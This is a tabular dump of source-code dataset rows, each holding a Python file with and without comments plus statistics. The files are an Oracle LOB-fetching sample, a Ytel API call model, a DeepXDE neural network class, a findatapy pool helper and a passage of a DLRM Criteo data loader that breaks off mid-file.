hexsha
stringlengths 40
40
| size
int64 2
1.02M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
245
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
245
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 2
1.02M
| avg_line_length
float64 1
417k
| max_line_length
int64 1
987k
| alphanum_fraction
float64 0
1
| content_no_comment
stringlengths 0
1.01M
| is_comment_constant_removed
bool 1
class | is_sharp_comment_removed
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1c4206925a8873719c846bb49eb9fa449ed6ad0b
| 2,778
|
py
|
Python
|
python/return_lobs_as_strings.py
|
granadomoreno/oracle-db-examples
|
feac5d72f4a8534c9b3e848bdfc501c5b4c69268
|
[
"Apache-2.0"
] | 1,071
|
2017-04-06T16:59:55.000Z
|
2022-03-25T21:10:58.000Z
|
python/return_lobs_as_strings.py
|
abhishektripathi27/oracle-db-examples
|
0812a65c7c974718ec5a04454b8a42f7c25bf2a8
|
[
"Apache-2.0"
] | 71
|
2017-04-12T14:55:52.000Z
|
2022-02-22T17:08:18.000Z
|
python/return_lobs_as_strings.py
|
abhishektripathi27/oracle-db-examples
|
0812a65c7c974718ec5a04454b8a42f7c25bf2a8
|
[
"Apache-2.0"
] | 749
|
2017-04-09T06:48:58.000Z
|
2022-03-23T00:28:26.000Z
|
#------------------------------------------------------------------------------
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
#
# Portions Copyright 2007-2015, Anthony Tuininga. All rights reserved.
#
# Portions Copyright 2001-2007, Computronix (Canada) Ltd., Edmonton, Alberta,
# Canada. All rights reserved.
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# return_lobs_as_strings.py
# Returns all CLOB values as strings and BLOB values as bytes. The
# performance of this technique is significantly better than fetching the LOBs
# and then reading the contents of the LOBs as it avoids round-trips to the
# database. Be aware, however, that this method requires contiguous memory so
# is not usable for very large LOBs.
#
# This script requires cx_Oracle 5.0 and higher.
#------------------------------------------------------------------------------
import cx_Oracle as oracledb
import sample_env
def output_type_handler(cursor, name, default_type, size, precision, scale):
if default_type == oracledb.CLOB:
return cursor.var(oracledb.LONG_STRING, arraysize=cursor.arraysize)
if default_type == oracledb.BLOB:
return cursor.var(oracledb.LONG_BINARY, arraysize=cursor.arraysize)
connection = oracledb.connect(sample_env.get_main_connect_string())
connection.outputtypehandler = output_type_handler
cursor = connection.cursor()
# add some data to the tables
print("Populating tables with data...")
cursor.execute("truncate table TestClobs")
cursor.execute("truncate table TestBlobs")
long_string = ""
for i in range(10):
char = chr(ord('A') + i)
long_string += char * 25000
# uncomment the line below for cx_Oracle 5.3 and earlier
# cursor.setinputsizes(None, oracledb.LONG_STRING)
cursor.execute("insert into TestClobs values (:1, :2)",
(i + 1, "STRING " + long_string))
# uncomment the line below for cx_Oracle 5.3 and earlier
# cursor.setinputsizes(None, oracledb.LONG_BINARY)
cursor.execute("insert into TestBlobs values (:1, :2)",
(i + 1, long_string.encode("ascii")))
connection.commit()
# fetch the data and show the results
print("CLOBS returned as strings")
cursor.execute("""
select
IntCol,
ClobCol
from TestClobs
order by IntCol""")
for int_col, value in cursor:
print("Row:", int_col, "string of length", len(value))
print()
print("BLOBS returned as bytes")
cursor.execute("""
select
IntCol,
BlobCol
from TestBlobs
order by IntCol""")
for int_col, value in cursor:
print("Row:", int_col, "string of length", value and len(value) or 0)
| 38.583333
| 79
| 0.62887
|
import cx_Oracle as oracledb
import sample_env
def output_type_handler(cursor, name, default_type, size, precision, scale):
if default_type == oracledb.CLOB:
return cursor.var(oracledb.LONG_STRING, arraysize=cursor.arraysize)
if default_type == oracledb.BLOB:
return cursor.var(oracledb.LONG_BINARY, arraysize=cursor.arraysize)
connection = oracledb.connect(sample_env.get_main_connect_string())
connection.outputtypehandler = output_type_handler
cursor = connection.cursor()
print("Populating tables with data...")
cursor.execute("truncate table TestClobs")
cursor.execute("truncate table TestBlobs")
long_string = ""
for i in range(10):
char = chr(ord('A') + i)
long_string += char * 25000
cursor.execute("insert into TestClobs values (:1, :2)",
(i + 1, "STRING " + long_string))
cursor.execute("insert into TestBlobs values (:1, :2)",
(i + 1, long_string.encode("ascii")))
connection.commit()
print("CLOBS returned as strings")
cursor.execute("""
select
IntCol,
ClobCol
from TestClobs
order by IntCol""")
for int_col, value in cursor:
print("Row:", int_col, "string of length", len(value))
print()
print("BLOBS returned as bytes")
cursor.execute("""
select
IntCol,
BlobCol
from TestBlobs
order by IntCol""")
for int_col, value in cursor:
print("Row:", int_col, "string of length", value and len(value) or 0)
| true
| true
|
1c4206db82fb99d15020a10c5521de38829b5ce7
| 8,324
|
py
|
Python
|
ytelapi/models/body.py
|
Ytel-Inc/YtelAPI-Python
|
139dc02d93e74c78b6c3d91e3002ae98e2270223
|
[
"MIT"
] | null | null | null |
ytelapi/models/body.py
|
Ytel-Inc/YtelAPI-Python
|
139dc02d93e74c78b6c3d91e3002ae98e2270223
|
[
"MIT"
] | null | null | null |
ytelapi/models/body.py
|
Ytel-Inc/YtelAPI-Python
|
139dc02d93e74c78b6c3d91e3002ae98e2270223
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
ytelapi
This file was automatically generated by APIMATIC v2.0 ( https://apimatic.io ).
"""
class Body(object):
"""Implementation of the 'body' model.
TODO: type model description here.
Attributes:
mfrom (string): A valid Ytel Voice enabled number (E.164 format) that
will be initiating the phone call.
to (string): To number
url (string): URL requested once the call connects
method (string): Specifies the HTTP method used to request the
required URL once call connects.
status_call_back_url (string): URL that can be requested to receive
notification when call has ended. A set of default parameters will
be sent here once the call is finished.
status_call_back_method (string): Specifies the HTTP methodlinkclass
used to request StatusCallbackUrl.
fall_back_url (string): URL requested if the initial Url parameter
fails or encounters an error
fall_back_method (string): Specifies the HTTP method used to request
the required FallbackUrl once call connects.
heart_beat_url (string): URL that can be requested every 60 seconds
during the call to notify of elapsed tim
heart_beat_method (string): Specifies the HTTP method used to request
HeartbeatUrl.
timeout (int): Time (in seconds) Ytel should wait while the call is
ringing before canceling the call
play_dtmf (string): DTMF Digits to play to the call once it connects.
0-9, #, or *
hide_caller_id (bool): Specifies if the caller id will be hidden
record (bool): Specifies if the call should be recorded
record_call_back_url (string): Recording parameters will be sent here
upon completion
record_call_back_method (string): Method used to request the
RecordCallback URL.
transcribe (bool): Specifies if the call recording should be
transcribed
transcribe_call_back_url (string): Transcription parameters will be
sent here upon completion
if_machine (IfMachineEnum): How Ytel should handle the receiving
numbers voicemail machine
if_machine_url (string): URL requested when IfMachine=continue
if_machine_method (string): Method used to request the IfMachineUrl.
feedback (bool): Specify if survey should be enable or not
survey_id (string): The unique identifier for the survey.
"""
# Create a mapping from Model property names to API property names
_names = {
"mfrom":'From',
"to":'To',
"url":'Url',
"method":'Method',
"status_call_back_url":'StatusCallBackUrl',
"status_call_back_method":'StatusCallBackMethod',
"fall_back_url":'FallBackUrl',
"fall_back_method":'FallBackMethod',
"heart_beat_url":'HeartBeatUrl',
"heart_beat_method":'HeartBeatMethod',
"timeout":'Timeout',
"play_dtmf":'PlayDtmf',
"hide_caller_id":'HideCallerId',
"record":'Record',
"record_call_back_url":'RecordCallBackUrl',
"record_call_back_method":'RecordCallBackMethod',
"transcribe":'Transcribe',
"transcribe_call_back_url":'TranscribeCallBackUrl',
"if_machine":'IfMachine',
"if_machine_url":'IfMachineUrl',
"if_machine_method":'IfMachineMethod',
"feedback":'Feedback',
"survey_id":'SurveyId'
}
def __init__(self,
mfrom=None,
to=None,
url=None,
method=None,
status_call_back_url=None,
status_call_back_method=None,
fall_back_url=None,
fall_back_method=None,
heart_beat_url=None,
heart_beat_method=None,
timeout=None,
play_dtmf=None,
hide_caller_id=None,
record=None,
record_call_back_url=None,
record_call_back_method=None,
transcribe=None,
transcribe_call_back_url=None,
if_machine=None,
if_machine_url=None,
if_machine_method=None,
feedback=None,
survey_id=None):
"""Constructor for the Body class"""
# Initialize members of the class
self.mfrom = mfrom
self.to = to
self.url = url
self.method = method
self.status_call_back_url = status_call_back_url
self.status_call_back_method = status_call_back_method
self.fall_back_url = fall_back_url
self.fall_back_method = fall_back_method
self.heart_beat_url = heart_beat_url
self.heart_beat_method = heart_beat_method
self.timeout = timeout
self.play_dtmf = play_dtmf
self.hide_caller_id = hide_caller_id
self.record = record
self.record_call_back_url = record_call_back_url
self.record_call_back_method = record_call_back_method
self.transcribe = transcribe
self.transcribe_call_back_url = transcribe_call_back_url
self.if_machine = if_machine
self.if_machine_url = if_machine_url
self.if_machine_method = if_machine_method
self.feedback = feedback
self.survey_id = survey_id
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
mfrom = dictionary.get('From')
to = dictionary.get('To')
url = dictionary.get('Url')
method = dictionary.get('Method')
status_call_back_url = dictionary.get('StatusCallBackUrl')
status_call_back_method = dictionary.get('StatusCallBackMethod')
fall_back_url = dictionary.get('FallBackUrl')
fall_back_method = dictionary.get('FallBackMethod')
heart_beat_url = dictionary.get('HeartBeatUrl')
heart_beat_method = dictionary.get('HeartBeatMethod')
timeout = dictionary.get('Timeout')
play_dtmf = dictionary.get('PlayDtmf')
hide_caller_id = dictionary.get('HideCallerId')
record = dictionary.get('Record')
record_call_back_url = dictionary.get('RecordCallBackUrl')
record_call_back_method = dictionary.get('RecordCallBackMethod')
transcribe = dictionary.get('Transcribe')
transcribe_call_back_url = dictionary.get('TranscribeCallBackUrl')
if_machine = dictionary.get('IfMachine')
if_machine_url = dictionary.get('IfMachineUrl')
if_machine_method = dictionary.get('IfMachineMethod')
feedback = dictionary.get('Feedback')
survey_id = dictionary.get('SurveyId')
# Return an object of this model
return cls(mfrom,
to,
url,
method,
status_call_back_url,
status_call_back_method,
fall_back_url,
fall_back_method,
heart_beat_url,
heart_beat_method,
timeout,
play_dtmf,
hide_caller_id,
record,
record_call_back_url,
record_call_back_method,
transcribe,
transcribe_call_back_url,
if_machine,
if_machine_url,
if_machine_method,
feedback,
survey_id)
| 40.407767
| 84
| 0.59827
|
class Body(object):
_names = {
"mfrom":'From',
"to":'To',
"url":'Url',
"method":'Method',
"status_call_back_url":'StatusCallBackUrl',
"status_call_back_method":'StatusCallBackMethod',
"fall_back_url":'FallBackUrl',
"fall_back_method":'FallBackMethod',
"heart_beat_url":'HeartBeatUrl',
"heart_beat_method":'HeartBeatMethod',
"timeout":'Timeout',
"play_dtmf":'PlayDtmf',
"hide_caller_id":'HideCallerId',
"record":'Record',
"record_call_back_url":'RecordCallBackUrl',
"record_call_back_method":'RecordCallBackMethod',
"transcribe":'Transcribe',
"transcribe_call_back_url":'TranscribeCallBackUrl',
"if_machine":'IfMachine',
"if_machine_url":'IfMachineUrl',
"if_machine_method":'IfMachineMethod',
"feedback":'Feedback',
"survey_id":'SurveyId'
}
def __init__(self,
mfrom=None,
to=None,
url=None,
method=None,
status_call_back_url=None,
status_call_back_method=None,
fall_back_url=None,
fall_back_method=None,
heart_beat_url=None,
heart_beat_method=None,
timeout=None,
play_dtmf=None,
hide_caller_id=None,
record=None,
record_call_back_url=None,
record_call_back_method=None,
transcribe=None,
transcribe_call_back_url=None,
if_machine=None,
if_machine_url=None,
if_machine_method=None,
feedback=None,
survey_id=None):
self.mfrom = mfrom
self.to = to
self.url = url
self.method = method
self.status_call_back_url = status_call_back_url
self.status_call_back_method = status_call_back_method
self.fall_back_url = fall_back_url
self.fall_back_method = fall_back_method
self.heart_beat_url = heart_beat_url
self.heart_beat_method = heart_beat_method
self.timeout = timeout
self.play_dtmf = play_dtmf
self.hide_caller_id = hide_caller_id
self.record = record
self.record_call_back_url = record_call_back_url
self.record_call_back_method = record_call_back_method
self.transcribe = transcribe
self.transcribe_call_back_url = transcribe_call_back_url
self.if_machine = if_machine
self.if_machine_url = if_machine_url
self.if_machine_method = if_machine_method
self.feedback = feedback
self.survey_id = survey_id
@classmethod
def from_dictionary(cls,
dictionary):
if dictionary is None:
return None
mfrom = dictionary.get('From')
to = dictionary.get('To')
url = dictionary.get('Url')
method = dictionary.get('Method')
status_call_back_url = dictionary.get('StatusCallBackUrl')
status_call_back_method = dictionary.get('StatusCallBackMethod')
fall_back_url = dictionary.get('FallBackUrl')
fall_back_method = dictionary.get('FallBackMethod')
heart_beat_url = dictionary.get('HeartBeatUrl')
heart_beat_method = dictionary.get('HeartBeatMethod')
timeout = dictionary.get('Timeout')
play_dtmf = dictionary.get('PlayDtmf')
hide_caller_id = dictionary.get('HideCallerId')
record = dictionary.get('Record')
record_call_back_url = dictionary.get('RecordCallBackUrl')
record_call_back_method = dictionary.get('RecordCallBackMethod')
transcribe = dictionary.get('Transcribe')
transcribe_call_back_url = dictionary.get('TranscribeCallBackUrl')
if_machine = dictionary.get('IfMachine')
if_machine_url = dictionary.get('IfMachineUrl')
if_machine_method = dictionary.get('IfMachineMethod')
feedback = dictionary.get('Feedback')
survey_id = dictionary.get('SurveyId')
return cls(mfrom,
to,
url,
method,
status_call_back_url,
status_call_back_method,
fall_back_url,
fall_back_method,
heart_beat_url,
heart_beat_method,
timeout,
play_dtmf,
hide_caller_id,
record,
record_call_back_url,
record_call_back_method,
transcribe,
transcribe_call_back_url,
if_machine,
if_machine_url,
if_machine_method,
feedback,
survey_id)
| true
| true
|
1c4206f4baef4d3380d19223d4bb597733644ce4
| 1,491
|
py
|
Python
|
deepxde/maps/tensorflow/fnn.py
|
fabyayu/deepxde
|
89880a4c61586512c87cabd1e7a3bdbaedf0feab
|
[
"Apache-2.0"
] | null | null | null |
deepxde/maps/tensorflow/fnn.py
|
fabyayu/deepxde
|
89880a4c61586512c87cabd1e7a3bdbaedf0feab
|
[
"Apache-2.0"
] | null | null | null |
deepxde/maps/tensorflow/fnn.py
|
fabyayu/deepxde
|
89880a4c61586512c87cabd1e7a3bdbaedf0feab
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from .nn import NN
from .. import activations
from .. import initializers
from .. import regularizers
from ...backend import tf
class FNN(NN):
"""Fully-connected neural network."""
def __init__(
self, layer_sizes, activation, kernel_initializer, regularization=None
):
super(FNN, self).__init__()
self.regularizer = regularizers.get(regularization)
self.denses = []
activation = activations.get(activation)
initializer = initializers.get(kernel_initializer)
for units in layer_sizes[1:-1]:
self.denses.append(
tf.keras.layers.Dense(
units,
activation=activation,
kernel_initializer=initializer,
kernel_regularizer=self.regularizer,
)
)
self.denses.append(
tf.keras.layers.Dense(
layer_sizes[-1],
kernel_initializer=initializer,
kernel_regularizer=self.regularizer,
)
)
def call(self, inputs, training=False):
y = inputs
if self._input_transform is not None:
y = self._input_transform(y)
for f in self.denses:
y = f(y)
if self._output_transform is not None:
y = self._output_transform(inputs, y)
return y
| 29.82
| 78
| 0.593561
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from .nn import NN
from .. import activations
from .. import initializers
from .. import regularizers
from ...backend import tf
class FNN(NN):
def __init__(
self, layer_sizes, activation, kernel_initializer, regularization=None
):
super(FNN, self).__init__()
self.regularizer = regularizers.get(regularization)
self.denses = []
activation = activations.get(activation)
initializer = initializers.get(kernel_initializer)
for units in layer_sizes[1:-1]:
self.denses.append(
tf.keras.layers.Dense(
units,
activation=activation,
kernel_initializer=initializer,
kernel_regularizer=self.regularizer,
)
)
self.denses.append(
tf.keras.layers.Dense(
layer_sizes[-1],
kernel_initializer=initializer,
kernel_regularizer=self.regularizer,
)
)
def call(self, inputs, training=False):
y = inputs
if self._input_transform is not None:
y = self._input_transform(y)
for f in self.denses:
y = f(y)
if self._output_transform is not None:
y = self._output_transform(inputs, y)
return y
| true
| true
|
1c4206f867f69dc25479bad4a9991f1cae1d265c
| 3,608
|
py
|
Python
|
findatapy/util/swimpool.py
|
mrderdelo/findatapy
|
5f619b372654a0246d6c12efedb286b237dba1a8
|
[
"Apache-2.0"
] | null | null | null |
findatapy/util/swimpool.py
|
mrderdelo/findatapy
|
5f619b372654a0246d6c12efedb286b237dba1a8
|
[
"Apache-2.0"
] | null | null | null |
findatapy/util/swimpool.py
|
mrderdelo/findatapy
|
5f619b372654a0246d6c12efedb286b237dba1a8
|
[
"Apache-2.0"
] | null | null | null |
__author__ = "saeedamen" # Saeed Amen
#
# Copyright 2016 Cuemacro
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on a "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#
from findatapy.util import DataConstants
class SwimPool(object):
"""Creating thread and process pools in a generic way. Allows users to
specify the underlying thread or multiprocess library
they wish to use. Note you can share Pool objects between processes.
"""
def __init__(self, multiprocessing_library=None):
self._pool = None
if multiprocessing_library is None:
multiprocessing_library = DataConstants().multiprocessing_library
self._multiprocessing_library = multiprocessing_library
self._thread_technique = 'na'
if multiprocessing_library == 'multiprocess':
try:
import multiprocess;
multiprocess.freeze_support()
except:
pass
elif multiprocessing_library == 'multiprocessing_on_dill':
try:
import multiprocessing_on_dill;
multiprocessing_on_dill.freeze_support()
except:
pass
elif multiprocessing_library == 'multiprocessing':
try:
import multiprocessing;
multiprocessing.freeze_support()
except:
pass
def create_pool(self, thread_technique, thread_no, force_new=True,
run_in_parallel=True):
self._thread_technique = thread_technique
if not (force_new) and self._pool is not None:
return self._pool
if thread_technique == "thread" or run_in_parallel == False:
from multiprocessing.dummy import Pool
elif thread_technique == "multiprocessing":
# most of the time is spend waiting for Bloomberg to return, so can use threads rather than multiprocessing
# must use the multiprocessing_on_dill library otherwise can't pickle objects correctly
# note: currently not very stable
if self._multiprocessing_library == 'multiprocessing_on_dill':
from multiprocessing_on_dill import Pool
elif self._multiprocessing_library == 'multiprocess':
from multiprocess import Pool
elif self._multiprocessing_library == 'multiprocessing':
from multiprocessing import Pool
elif self._multiprocessing_library == 'pathos':
from pathos.multiprocessing import Pool
# from pathos.pools import ProcessPool as Pool
elif self._multiprocessing_library == 'billiard':
from billiard.pool import Pool
if run_in_parallel == False: thread_no = 1
self._pool = Pool(thread_no)
return self._pool
def close_pool(self, pool, force_process_respawn=False):
if pool is not None:
if (self._thread_technique != 'multiprocessing' and
self._multiprocessing_library != 'pathos') \
or force_process_respawn:
pool.close()
pool.join()
| 37.978947
| 119
| 0.650499
|
__author__ = "saeedamen"
from findatapy.util import DataConstants
class SwimPool(object):
def __init__(self, multiprocessing_library=None):
self._pool = None
if multiprocessing_library is None:
multiprocessing_library = DataConstants().multiprocessing_library
self._multiprocessing_library = multiprocessing_library
self._thread_technique = 'na'
if multiprocessing_library == 'multiprocess':
try:
import multiprocess;
multiprocess.freeze_support()
except:
pass
elif multiprocessing_library == 'multiprocessing_on_dill':
try:
import multiprocessing_on_dill;
multiprocessing_on_dill.freeze_support()
except:
pass
elif multiprocessing_library == 'multiprocessing':
try:
import multiprocessing;
multiprocessing.freeze_support()
except:
pass
def create_pool(self, thread_technique, thread_no, force_new=True,
run_in_parallel=True):
self._thread_technique = thread_technique
if not (force_new) and self._pool is not None:
return self._pool
if thread_technique == "thread" or run_in_parallel == False:
from multiprocessing.dummy import Pool
elif thread_technique == "multiprocessing":
# note: currently not very stable
if self._multiprocessing_library == 'multiprocessing_on_dill':
from multiprocessing_on_dill import Pool
elif self._multiprocessing_library == 'multiprocess':
from multiprocess import Pool
elif self._multiprocessing_library == 'multiprocessing':
from multiprocessing import Pool
elif self._multiprocessing_library == 'pathos':
from pathos.multiprocessing import Pool
# from pathos.pools import ProcessPool as Pool
elif self._multiprocessing_library == 'billiard':
from billiard.pool import Pool
if run_in_parallel == False: thread_no = 1
self._pool = Pool(thread_no)
return self._pool
def close_pool(self, pool, force_process_respawn=False):
if pool is not None:
if (self._thread_technique != 'multiprocessing' and
self._multiprocessing_library != 'pathos') \
or force_process_respawn:
pool.close()
pool.join()
| true
| true
|
1c420711beff9837696decc0b73a04ed0db8b294
| 14,316
|
py
|
Python
|
NVIDIA/benchmarks/dlrm/implementations/pytorch/dlrm/data/dataset.py
|
goswamig/training_results_v0.7
|
4278ce8a0f3d4db6b5e6054277724ca36278d7a3
|
[
"Apache-2.0"
] | 48
|
2020-07-29T18:09:23.000Z
|
2021-10-09T01:53:33.000Z
|
NVIDIA/benchmarks/dlrm/implementations/pytorch/dlrm/data/dataset.py
|
goswamig/training_results_v0.7
|
4278ce8a0f3d4db6b5e6054277724ca36278d7a3
|
[
"Apache-2.0"
] | 9
|
2021-04-02T02:28:07.000Z
|
2022-03-26T18:23:59.000Z
|
NVIDIA/benchmarks/dlrm/implementations/pytorch/dlrm/data/dataset.py
|
lablup/training_results_v0.7
|
f5bb59aa0f8b18b602763abe47d1d24d0d54b197
|
[
"Apache-2.0"
] | 42
|
2020-08-01T06:41:24.000Z
|
2022-01-20T10:33:08.000Z
|
import concurrent
import functools
import math
import os
import queue
import numpy as np
from dlrm import mlperf_logger
import torch
from torch.utils.data import Dataset
from dlrm.utils import distributed as dist
def get_data_loader(dataset_path,
batch_size,
test_batch_size,
return_device="cuda",
dataset_type="bin",
num_workers=0,
shuffle=False,
**kwargs):
"""Create data loaders
Args:
dataset_path (str): Path to dataset, train_data.bin and test_data.bin must exist under dataset_path.
batch_size (int): Training batch size
test_batch_size (int): Test batch size
return_device (str): Where to put the returned data. Default 'cuda'
dataset_type (str): One of ["bin", "memmap", "dist"] indicates which dataset to use. Default "bin".
num_works (int): Default 0
shuffle (bool): If True, shuffle batch order. Default False.
Keyword Arguments:
numerical_features(boolean): If True, load numerical features for bottom_mlp. Default False
categorical_features (list or None): categorical features used by the rank
Returns:
data_loader_train (DataLoader):
data_loader_test (DataLoader):
"""
train_dataset_bin = os.path.join(dataset_path, "train_data.bin")
test_dataset_bin = os.path.join(dataset_path, "test_data.bin")
if dataset_type == 'bin':
dataset_train = CriteoBinDataset(train_dataset_bin, batch_size=batch_size, shuffle=shuffle)
dataset_test = CriteoBinDataset(test_dataset_bin, batch_size=test_batch_size)
elif dataset_type == 'memmap':
dataset_train = CriteoMemmapDataset(train_dataset_bin, batch_size=batch_size, shuffle=shuffle)
dataset_test = CriteoMemmapDataset(test_dataset_bin, batch_size=test_batch_size)
elif dataset_type == 'dist':
dataset_train = DistCriteoDataset(
os.path.join(dataset_path, "train"), batch_size=batch_size, shuffle=shuffle, **kwargs)
if hasattr(dataset_train, 'num_samples'):
mlperf_logger.log_event(key=mlperf_logger.constants.TRAIN_SAMPLES,
value=dataset_train.num_samples)
dataset_test = DistCriteoDataset(
os.path.join(dataset_path, "test"), batch_size=test_batch_size, **kwargs)
if hasattr(dataset_test, 'num_samples'):
mlperf_logger.log_event(key=mlperf_logger.constants.EVAL_SAMPLES,
value=dataset_test.num_samples)
data_loader_args = dict(
batch_size=None,
num_workers=num_workers,
pin_memory=False,
collate_fn=functools.partial(data_collate_fn, device=return_device, orig_stream=torch.cuda.current_stream()))
data_loader_train = torch.utils.data.DataLoader(dataset_train, **data_loader_args)
data_loader_test = torch.utils.data.DataLoader(dataset_test, **data_loader_args)
return data_loader_train, data_loader_test
def _dist_permutation(size):
"""Generate permutation for dataset shuffle
Args:
size (int): Size and high value of permutation
Returns:
permutation (ndarray):
"""
if dist.get_world_size() > 1:
# To guarantee all ranks have the same same permutation, generating it from rank 0 and sync
# to other rank by writing to disk
permutation_file = "/tmp/permutation.npy"
if dist.get_local_rank() == 0:
np.save(permutation_file, np.random.permutation(size))
torch.distributed.barrier()
permutation = np.load(permutation_file)
else:
permutation = np.random.permutation(size)
return permutation
class CriteoBinDataset(Dataset):
"""Binary version of criteo dataset.
Main structure is copied from reference. With following changes:
- Removed unnecessary things, like counts_file which is not really used in training.
- _transform_features is removed, doing it on GPU is much faster.
"""
def __init__(self, data_file, batch_size=1, bytes_per_feature=4, shuffle=False):
# dataset. single target, 13 dense features, 26 sparse features
self.tad_fea = 1 + 13
self.tot_fea = 1 + 13 + 26
self.batch_size = batch_size
self.bytes_per_batch = (bytes_per_feature * self.tot_fea * batch_size)
self.num_batches = math.ceil(os.path.getsize(data_file) / self.bytes_per_batch)
print('data file:', data_file, 'number of batches:', self.num_batches)
self.file = open(data_file, 'rb', buffering=0)
if shuffle:
self.permutation = _dist_permutation(self.num_batches - 1)
else:
self.permutation = None
def __len__(self):
return self.num_batches
def __getitem__(self, idx):
if self.permutation is not None and idx != self.num_batches - 1:
idx = self.permutation[idx]
self.file.seek(idx * self.bytes_per_batch, 0)
raw_data = self.file.read(self.bytes_per_batch)
array = np.frombuffer(raw_data, dtype=np.int32)
tensor = torch.from_numpy(array).view((-1, self.tot_fea))
return tensor
def __del__(self):
self.file.close()
class CriteoMemmapDataset(Dataset):
"""Memmap version of criteo dataset
Accessing sequentially is a lot faster on memmap
Args:
data_file (str): Full path to binary file of dataset
batch_size (int):
bytes_per_feature (int): Default 4
shuffle (bool): If True, shuffle batch order by creating a permutation. Default False
"""
def __init__(self, data_file, batch_size, bytes_per_feature=4, shuffle=False):
self.record_width = 40 # 13 numerical, 26 categorical, 1 label
self.batch_size = batch_size
bytes_per_batch = (bytes_per_feature * self.record_width * batch_size)
self.num_batches = math.ceil(os.path.getsize(data_file) / bytes_per_batch)
if shuffle:
self.permutation = _dist_permutation(self.num_batches - 1)
else:
self.permutation = None
self.mmap = np.memmap(data_file, dtype=np.int32, mode='r')
def __len__(self):
return self.num_batches
def __getitem__(self, idx):
if self.permutation is not None and idx != self.num_batches - 1:
idx = self.permutation[idx]
start_idx = idx * (self.batch_size * self.record_width)
end_idx = min((idx + 1) * (self.batch_size * self.record_width), self.mmap.shape[0])
array = self.mmap[start_idx:end_idx]
tensor = torch.from_numpy(array).reshape(-1, self.record_width)
return tensor
class DistCriteoDataset(Dataset):
"""Distributed version of Criteo dataset
Args:
data_path (str): Full path to split binary file of dataset. It must contain numerical.bin, label.bin and
cat_0 ~ cat_25.bin
batch_size (int):
shuffle (boolean):
numerical_features(boolean): If True, load numerical features for bottom_mlp. Default False
categorical_features (list or None): categorical features used by the rank
prefetch_depth (int): How many samples to prefetch. Default 10.
"""
def __init__(self, data_path, batch_size=1, shuffle=False, numerical_features=False, categorical_features=None,
prefetch_depth=10):
bytes_per_label = 4
self.bytes_per_batch = {
"label": bytes_per_label * batch_size,
"numerical": 13 * 4 * batch_size if numerical_features else 0,
"categorical": 4 * batch_size if categorical_features is not None else 0
}
self.batch_size = batch_size
self.label_file = os.open(os.path.join(data_path, F"label.bin"), os.O_RDONLY)
label_file_size = os.fstat(self.label_file).st_size
self.num_samples = int(label_file_size / bytes_per_label)
self.num_batches = math.ceil(label_file_size / self.bytes_per_batch["label"])
if numerical_features:
self.numerical_features_file = os.open(os.path.join(data_path, "numerical.bin"), os.O_RDONLY)
if math.ceil(os.fstat(self.numerical_features_file).st_size /
self.bytes_per_batch["numerical"]) != self.num_batches:
raise ValueError("Size miss match in data files")
else:
self.numerical_features_file = None
if categorical_features is not None and categorical_features:
self.categorical_features_files = []
for cat_id in categorical_features:
cat_file = os.open(os.path.join(data_path, F"cat_{cat_id}.bin"), os.O_RDONLY)
if math.ceil(
os.fstat(cat_file).st_size / self.bytes_per_batch["categorical"]) != self.num_batches:
raise ValueError("Size miss match in data files")
self.categorical_features_files.append(cat_file)
else:
self.categorical_features_files = None
if shuffle:
self.permutation = _dist_permutation(self.num_batches - 1)
else:
self.permutation = None
self.prefetch_depth = min(prefetch_depth, self.num_batches)
self.prefetch_queue = queue.Queue()
self.executor = concurrent.futures.ThreadPoolExecutor(max_workers=1)
def __len__(self):
return self.num_batches
def getitem(self, idx):
if self.permutation is not None and idx != self.num_batches - 1:
idx = self.permutation[idx]
raw_label_data = os.pread(
self.label_file, self.bytes_per_batch["label"], idx * self.bytes_per_batch["label"])
click = torch.from_numpy(np.frombuffer(raw_label_data, dtype=np.float32))
if self.numerical_features_file is not None:
raw_numerical_data = os.pread(
self.numerical_features_file,
self.bytes_per_batch["numerical"],
idx * self.bytes_per_batch["numerical"])
numerical_features = torch.from_numpy(np.frombuffer(raw_numerical_data,
dtype=np.float32)).view(-1, 13)
else:
numerical_features = None
if self.categorical_features_files is not None:
categorical_features = []
for cat_file in self.categorical_features_files:
raw_cat_data = os.pread(
cat_file,
self.bytes_per_batch["categorical"],
idx * self.bytes_per_batch["categorical"])
categorical_features.append(torch.from_numpy(np.frombuffer(raw_cat_data, dtype=np.int32)).unsqueeze(1))
